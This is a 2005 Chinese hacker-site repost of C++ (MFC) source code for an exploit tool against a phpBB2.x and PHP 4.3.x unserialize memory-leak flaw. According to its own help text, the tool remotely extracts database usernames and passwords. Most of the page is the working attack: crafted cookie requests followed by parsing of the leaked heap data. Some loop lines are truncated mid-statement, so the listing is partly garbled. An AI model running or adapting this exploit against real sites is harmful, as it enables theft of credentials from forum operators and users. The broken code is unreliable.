积木首页 | 500多种网页特效 | 函数手册 | 广播电台 | 高清晰图片素材 | 服务器合租 | 万年历 | 网友最新浏览记录
程序开发 网页设计 搜索引擎 特效代码 操作系统 防范病毒 黑客技术 图形图象 电脑硬件 网络技术 服 务 器 数 据 库 网文精粹
您的位置:积木首页 >> 黑客技术频道 >> 黑客编程 >> 正文:
标题:PHPunserialize程序源代码
时间:2005-1-7 来源:不详 浏览数:

我看到有人回复想要看程序的源码,给帖出来了。

我的程序写的不好,所以以前没给源码。

主程序,用VC写的。很多注释部分给加 file://,这是这个系统的问题。

phpunserialize.cpp

 

// phpunserializeDlg.cpp : implementation file
//

#include "stdafx.h"
#include "phpunserialize.h"
#include "phpunserializeDlg.h"

#include "myfunc.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

#include
#pragma comment(lib,"ws2_32")

/////////////////////////////////////////////////////////////////////////////
// CAboutDlg dialog used for App About

class CAboutDlg : public CDialog
{
public:
 CAboutDlg();

// Dialog Data
 file://{{AFX_DATA(CAboutDlg)
 enum { IDD = IDD_ABOUTBOX };
 file://}}AFX_DATA

 // ClassWizard generated virtual function overrides
 file://{{AFX_VIRTUAL(CAboutDlg)
 protected:
 virtual void DoDataExchange(CDataExchange* pDX);    // DDX/DDV support
 file://}}AFX_VIRTUAL

// Implementation
protected:
 file://{{AFX_MSG(CAboutDlg)
 file://}}AFX_MSG
 DECLARE_MESSAGE_MAP()
};

CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
 file://{{AFX_DATA_INIT(CAboutDlg)
 file://}}AFX_DATA_INIT
}

void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
 CDialog::DoDataExchange(pDX);
 file://{{AFX_DATA_MAP(CAboutDlg)
 file://}}AFX_DATA_MAP
}

BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
 file://{{AFX_MSG_MAP(CAboutDlg)
  // No message handlers
 file://}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CPhpunserializeDlg dialog

CPhpunserializeDlg::CPhpunserializeDlg(CWnd* pParent /*=NULL*/)
 : CDialog(CPhpunserializeDlg::IDD, pParent)
{
 file://{{AFX_DATA_INIT(CPhpunserializeDlg)
 m_strUrl = _T("");
 m_strPort = _T("");
 m_strUri = _T("");
 m_memread = _T("");
 m_strCookie = _T("");
 m_strContent = _T("");
 m_repeat = _T("");
 m_strshow = _T("");
 file://}}AFX_DATA_INIT
 // Note that LoadIcon does not require a subsequent DestroyIcon in Win32
 m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}

void CPhpunserializeDlg::DoDataExchange(CDataExchange* pDX)
{
 CDialog::DoDataExchange(pDX);
 file://{{AFX_DATA_MAP(CPhpunserializeDlg)
 DDX_Text(pDX, IDC_URL, m_strUrl);
 DDX_Text(pDX, IDC_PORT, m_strPort);
 DDX_Text(pDX, IDC_URI, m_strUri);
 DDX_Text(pDX, IDC_MEMREAD, m_memread);
 DDX_Text(pDX, IDC_COOKIE, m_strCookie);
 DDX_Text(pDX, IDC_CONTENT, m_strContent);
 DDX_Text(pDX, IDC_REPEAT, m_repeat);
 DDX_Text(pDX, IDC_SHOW, m_strshow);
 file://}}AFX_DATA_MAP
}

BEGIN_MESSAGE_MAP(CPhpunserializeDlg, CDialog)
 file://{{AFX_MSG_MAP(CPhpunserializeDlg)
 ON_WM_SYSCOMMAND()
 ON_WM_PAINT()
 ON_WM_QUERYDRAGICON()
 ON_BN_CLICKED(IDOK2, OnOk2)
 file://}}AFX_MSG_MAP
END_MESSAGE_MAP()

/////////////////////////////////////////////////////////////////////////////
// CPhpunserializeDlg message handlers

BOOL CPhpunserializeDlg::OnInitDialog()
{
 CDialog::OnInitDialog();

 // Add "About..." menu item to system menu.

 // IDM_ABOUTBOX must be in the system command range.
 ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
 ASSERT(IDM_ABOUTBOX < 0xF000);

 CMenu* pSysMenu = GetSystemMenu(FALSE);
 if (pSysMenu != NULL)
 {
  CString strAboutMenu;
  strAboutMenu.LoadString(IDS_ABOUTBOX);
  if (!strAboutMenu.IsEmpty())
  {
   pSysMenu->AppendMenu(MF_SEPARATOR);
   pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
  }
 }

 // Set the icon for this dialog.  The framework does this automatically
 //  when the application's main window is not a dialog
 SetIcon(m_hIcon, TRUE);   // Set big icon
 SetIcon(m_hIcon, FALSE);  // Set small icon
 
 // TODO: Add extra initialization here
 m_strUrl="127.0.0.1";
 m_strPort="80";
 m_memread="3000";
 m_strUri="/phpbb2/";
 m_strCookie="phpbb2mysql";
 m_repeat="1";
 m_strshow='N';
 m_strContent="phpBB2.x&PHP4.3.x unserialize函数内存泄露漏洞利用程序\r\n\r\n"
  "程序可远程导出数据库用户名密码,有时延迟较长.\r\n要根据网站适当变换读取字节数,其他最好按默认.\r\n程序不是很健壮,得多试几次.\r\n"
  "COOKIE部分,要看程序的返回信息,有的系统是phpBB或phpBB2\r\n返回信息处输入'y'或者'Y'将返回详细信息\r\n\r\n"
  "作者:小花 QQ:56111981 http://xiaohuar.blogchina.com\r\n";
 
 UpdateData(FALSE);
 m_flag=1;
 return TRUE;  // return TRUE  unless you set the focus to a control
}

void CPhpunserializeDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
 if ((nID & 0xFFF0) == IDM_ABOUTBOX)
 {
  CAboutDlg dlgAbout;
  dlgAbout.DoModal();
 }
 else
 {
  CDialog::OnSysCommand(nID, lParam);
 }
}

// If you add a minimize button to your dialog, you will need the code below
//  to draw the icon.  For MFC applications using the document/view model,
//  this is automatically done for you by the framework.

void CPhpunserializeDlg::OnPaint()
{
 if (IsIconic())
 {
  CPaintDC dc(this); // device context for painting

  SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0);

  // Center icon in client rectangle
  int cxIcon = GetSystemMetrics(SM_CXICON);
  int cyIcon = GetSystemMetrics(SM_CYICON);
  CRect rect;
  GetClientRect(&rect);
  int x = (rect.Width() - cxIcon + 1) / 2;
  int y = (rect.Height() - cyIcon + 1) / 2;

  // Draw the icon
  dc.DrawIcon(x, y, m_hIcon);
 }
 else
 {
  CDialog::OnPaint();
 }
}

// The system calls this to obtain the cursor to display while the user drags
//  the minimized window.
HCURSOR CPhpunserializeDlg::OnQueryDragIcon()
{
 return (HCURSOR) m_hIcon;
}

void CPhpunserializeDlg::OnOK()
{
 // TODO: Add extra validation here
 UpdateData(TRUE);
 m_strContent="";
 char getrequest[512];
   
 strcpy(getrequest,"Set-Cookie: ");
 strcat(getrequest,(LPCTSTR)m_strCookie);
 strcat(getrequest,"_data=");

 int nbmemread=atoi(m_memread);
 if(!nbmemread){MessageBox("请输入字节数");return;}

 unsigned short urlport=atoi(m_strPort);

 file://Create connection


 struct sockaddr_in mytcp;
 struct hostent * hp;
 unsigned int sock,addr,rc;

 memset(&mytcp, 0, sizeof(mytcp));

    WSAData wsadata;
 if (WSAStartup(MAKEWORD(2, 0),&wsadata) != 0)exit(1);
    hp = gethostbyname(m_strUrl);
 
    if (!hp){
  addr = inet_addr(m_strUrl);
 }
   if((!hp)&&(addr==INADDR_NONE))
   {
   m_strContent+="无法解析 ";
   m_strContent+=m_strUrl;
   UpdateData(FALSE);
   WSACleanup();
   return;
   }

   if(hp!=NULL)memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
   else mytcp.sin_addr.s_addr = htonl(addr);
      
   if(hp)mytcp.sin_family = hp->h_addrtype;
   else  mytcp.sin_family = AF_INET;

   mytcp.sin_port=htons(urlport);
  
   if(m_strUri==""){MessageBox("路径必须有值,可以为/");return;}
   char sendrequest[1024]={0};
   strcat(sendrequest,"GET ");
   strcat(sendrequest,m_strUri);
   strcat(sendrequest," HTTP/1.1\nHost: ");
   strcat(sendrequest,m_strUrl);
   strcat(sendrequest,"\nAccept-Language: fr\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; WindowsNT 5.1)\nCookie: ");
   strcat(sendrequest,m_strCookie);
   strcat(sendrequest,"_data=s:");
   strcat(sendrequest,m_memread);
   strcat(sendrequest,":%22test1%22%3b; ");
   strcat(sendrequest,m_strCookie);
   strcat(sendrequest,"_sid=1cfd759c33ba2a45b994c7b7cfd948ec; expires=Fri, 24-Dec-2005 21:25:37 GMT; path=/; domain=\nConnection: close\n\n");
  

   int repeat=atoi(m_repeat);
   if(repeat<=0){MessageBox("重复次数必须大于0");return;}
    do{
 
  sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
       if (!sock)
    { 
    MessageBox("无法连接");
       closesocket(sock);
 
       UpdateData(FALSE);
       WSACleanup();
    return;
    }
       m_strContent+="\r\n\r\n准备建立连接,";
       rc=connect(sock, (struct sockaddr *)&mytcp,sizeof(struct sockaddr_in));
  
      if(rc==0)
   {
   
    m_strContent+="连接成功\r\n";
    file://发送数据
       ::send(sock,sendrequest,sizeof(sendrequest),0);
    ::Sleep(2000);//睡眠5秒
    char getdata[1000000];//1M数据
    memset(getdata,0,sizeof(getdata));
    recv(sock,getdata,sizeof(getdata),0);
   
    if(m_strshow=="Y"||m_strshow=="y"){m_strContent+=getdata;m_strContent+="\r\n\r\n";}

     char signature[512];
  char *word,*wtmp,car;
  unsigned int cpt ,sizesign;
  unsigned int compteur,cptstr;
  BOOL exit = 0;
  sizesign = strlen(getrequest);
  memset(signature,'a',sizesign);
  signature[sizesign] ='\0';
  compteur = 0;
  cptstr = 0;
  int getdatacount=0;
  while(!exit && (car=getdata[getdatacount++]))
  {
   // ajout du detecteur de heap
   for(cpt = 0; cpt < (sizesign-1);cpt++)
    signature[cpt] = signature[cpt+1];
   signature[sizesign-1]=car;

   if(!strcmp(signature,getrequest))
   {
    word = new char[nbmemread*3+1];
    word[cptstr] = '\0';
    compteur=strlen(intostr(nbmemread)) + 4;
    compteur+=compteur;
    for(cpt=0; cpt

    while(!exit && (car=getdata[getdatacount++]))
    {
    if((car == ';') || (cptstr>= (nbmemread*3)))
     {
      exit = 1;
      continue;
     };
     word[cptstr] = car;
     cptstr++;
     word[cptstr] ='\0';
    };

    nbmemread = utf8decode(word);

    /*
    char allgoodchar[30000];
    memset(allgoodchar,0,sizeof(allgoodchar));
    int goodcharcount=0;
    */
    for(compteur=0;compteur    {
     for(cpt=compteur;goodcar(word[cpt]);cpt++);//{allgoodchar[goodcharcount]=word[cpt];goodcharcount++;}
    
     if((cpt - compteur)>1)
     {
        wtmp = new char[(cpt - compteur)+1];
        strncpy(wtmp,&word[compteur],cpt - compteur);
        wtmp[cpt - compteur] = '\0';
    
     m_strContent+="探测字符串结果:";
        m_strContent+=wtmp;
     m_strContent+="\r\n";
        delete[] wtmp;
     }
     if(!(cpt - compteur))cpt++;
     compteur = cpt;

    };


    delete[] word;
    file://m_strContent+=allgoodchar;
   };//End of (发现Setcookie)

  
  };//End of While

    file://打印数据
        
   }

    else {closesocket(sock); MessageBox("连接失败");  UpdateData(FALSE); WSACleanup(); return;   }
    shutdown(sock,1);
    closesocket(sock);
    repeat--;
 UpdateData(FALSE);
 ::Sleep(10000);//等待10秒
 if(m_flag==0)break;
 }while(repeat);


   m_strContent+="\r\n\r\n运行结束\r\n";
   UpdateData(FALSE);
   WSACleanup();

}

void CPhpunserializeDlg::OnOk2()
{
 // TODO: Add your control notification handler code here
 if(m_flag==0)m_flag=1;
 else if(m_flag==1)m_flag=0;
}


(责任编辑:欣欣裴)
关于本站 | 广告服务 | 联系我们 | 版权申明 | 强强联盟 | 投稿热线 | 网站地图 | 申请链接
Copyright ©2005-2006 Gimoo.net All rights reserved. 积木网 版权所有
E-mail:gimoohr@gmail.com 京ICP备05050695号